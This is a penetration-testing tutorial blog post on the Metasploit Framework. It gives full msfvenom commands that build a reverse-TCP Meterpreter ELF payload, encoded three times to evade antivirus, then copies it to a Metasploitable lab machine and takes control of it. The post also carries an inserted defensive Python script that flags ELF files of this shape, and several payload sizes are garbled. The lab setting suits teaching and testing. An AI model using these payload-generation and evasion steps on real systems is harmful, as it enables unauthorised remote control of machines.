Metasploit Introduction
Almost everyone who does penetration testing will come across the Metasploit Framework, usually referred to as MSF. It is a penetration testing framework written in Ruby that integrates many publicly available exploits, such as the famous ms08_067. Within the framework you can carry out a whole series of penetration tests, using the existing payloads, such as Meterpreter, to obtain a shell on the target. The project is hosted on GitHub; git clone the repository to install it locally.
Common Tools Introduction
Msfconsole
This is the terminal command that starts MSF. Note that since MSF's default database is PostgreSQL, you need to start the PostgreSQL service before starting MSF.
MSF is started by entering msfconsole in the terminal. If you are not sure what msfconsole can do, enter
msfconsole -h
in the terminal to see the options msfconsole supports.
For example, it is worth noting that msfconsole is not only the command that launches MSF directly; it can also execute a file generated by a third-party tool (a resource file) with MSF:
msfconsole -r payload.file
This feature works well with Veil. Veil is a payload-generation tool aimed at antivirus evasion; when it generates a stager-type payload it also generates the corresponding stage-side file for the listening end to use, and the payload is compatible with MSF.
Msfvenom
Earlier MSF releases shipped tools such as msfencode and msfpayload, which had a high learning cost and are now obsolete. The msfvenom tool replaces them and can be seen as a combination of msfencode and msfpayload; it lets you generate the payload you want yourself.
To learn msfvenom, view its description in the terminal with:
msfvenom -h
To list the payloads msfvenom provides, use
msfvenom -l payloads
which shows all available payloads.
Below we use the linux/x86/meterpreter/reverse_tcp payload to demonstrate creating an ELF file that runs on the x86 architecture.
To see the parameter options for this payload, simply type on the command line:
freestyle4568@freestyle4568 ~ $ msfvenom -p linux/x86/meterpreter/reverse_tcp --payload-options
It is important to note that the arch option indicates the kernel architecture the payload applies to: on an x86 kernel it will run, but on an x64 kernel it will not. An x86_64 kernel, however, is able to run both 32-bit and 64-bit programs.
To check the kernel architecture, run uname -a on each machine:
uname -a
3.13.0-24 #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
uname -a
2.6.24-16 #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
You can see that the kernel of the msfadmin machine is x86: i686 is an x86 architecture that can only run 32-bit programs, whereas the first machine is x86_64.
Below we generate a payload that is executable on Metasploitable:
freestyle4568@freestyle4568 ~ $ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.101 -f elf -e x86/shikata_ga_nai -i 3 -o shell
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 98 (iteration=0)
x86/shikata_ga_nai succeeded with size [size garbled in original] (iteration=1)
x86/shikata_ga_nai succeeded with size [size garbled in original] (iteration=2)
x86/shikata_ga_nai chosen with final size [size garbled in original]
Payload size: [size garbled in original] bytes
Final size of elf file: 236 bytes
Saved as: shell
You can see that the options we did not set take the payload's defaults. The resulting shell file is an ELF executable for an x86 Linux kernel. At the same time we encoded it three times with x86/shikata_ga_nai, in order to evade antivirus detection.
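A defender-side check related to the file above, added here as an example and not part of the original post or of Metasploit itself: a header-only ELF triage in Python that reports word size and machine type (the i686 versus x86_64 question from the uname output) and flags the shape a tiny, section-less, RWX-mapped ELF like the 236-byte shell file has. The sample binary is constructed inline from dummy bytes, and its one-segment layout (52-byte ELF32 header plus one 32-byte program header) is an assumption about how such a minimal ELF is laid out, not taken from Metasploit's template.

```python
import struct

# ELF constants for a header-only triage (values from the ELF specification).
EM_386, EM_X86_64 = 3, 62            # e_machine: 32-bit x86 and x86_64
PT_LOAD = 1
PF_X, PF_W, PF_R = 1, 2, 4
RWX = PF_R | PF_W | PF_X
EHDR32 = "<HHIIIIIHHHHHH"            # Elf32_Ehdr fields after the 16-byte e_ident
EHDR64 = "<HHIQQQIHHHHHH"            # Elf64_Ehdr fields after e_ident (same field order)
PHDR32 = "<IIIIIIII"                 # Elf32_Phdr: type,offset,vaddr,paddr,filesz,memsz,flags,align
PHDR64 = "<IIQQQQQQ"                 # Elf64_Phdr: type,flags,offset,vaddr,paddr,filesz,memsz,align


def triage_elf(data: bytes) -> dict:
    """Report word size, machine type, missing section table and RWX load segments."""
    if data[:4] != b"\x7fELF" or data[5] != 1:    # only little-endian files handled here
        raise ValueError("not a little-endian ELF file")
    is64 = data[4] == 2                           # EI_CLASS: 1 = ELF32, 2 = ELF64
    f = struct.unpack_from(EHDR64 if is64 else EHDR32, data, 16)
    machine, phoff, phentsize, phnum, shnum = f[1], f[4], f[8], f[9], f[11]
    phdr_fmt, flags_idx = (PHDR64, 1) if is64 else (PHDR32, 6)
    rwx_segments = 0
    for i in range(phnum):
        ph = struct.unpack_from(phdr_fmt, data, phoff + i * phentsize)
        if ph[0] == PT_LOAD and (ph[flags_idx] & RWX) == RWX:
            rwx_segments += 1
    return {
        "bits": 64 if is64 else 32,
        "machine": {EM_386: "x86", EM_X86_64: "x86_64"}.get(machine, f"unknown({machine})"),
        "no_section_headers": shnum == 0,
        "rwx_load_segments": rwx_segments,
        "size": len(data),
        # tiny, no section table, code mapped RWX: the shape of a raw dropped payload
        "suspicious_shape": shnum == 0 and rwx_segments > 0 and len(data) < 4096,
    }


def build_minimal_elf32(payload: bytes, base: int = 0x08048000) -> bytes:
    """CONSTRUCTED sample: 52-byte ELF32 header + one 32-byte RWX PT_LOAD header,
    no section table, then the payload bytes (84-byte header in total)."""
    total = 84 + len(payload)
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8   # ELF32, little-endian, v1
    ehdr = ident + struct.pack(EHDR32, 2, EM_386, 1, base + 84, 52, 0, 0, 52, 32, 1, 0, 0, 0)
    phdr = struct.pack(PHDR32, PT_LOAD, 0, base, base, total, total, RWX, 0x1000)
    return ehdr + phdr + payload


if __name__ == "__main__":
    sample = build_minimal_elf32(b"\x90" * 152)   # dummy NOP bytes, sized to give 236 bytes total
    print(triage_elf(sample))
```

Run it on a real file with triage_elf(open(path, "rb").read()); a result with suspicious_shape set is a reason to examine what the file connects to, not proof of anything by itself.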
We copy it to the Metasploitable system and listen for the connection with the matching handler on the freestyle4568 system.
freestyle4568@freestyle4568 ~ $ scp shell msfadmin@192.168.1.103:/home/msfadmin
msfadmin@192.168.1.103's password:
shell                                         100%  236     0.2KB/s   00:00
Run the shell file on msfadmin, then listen with MSF on freestyle4568.
OK! We now get a Meterpreter session and essentially have control of 192.168.1.103.
Meterpreter deserves a separate article when time allows, because this payload is very powerful.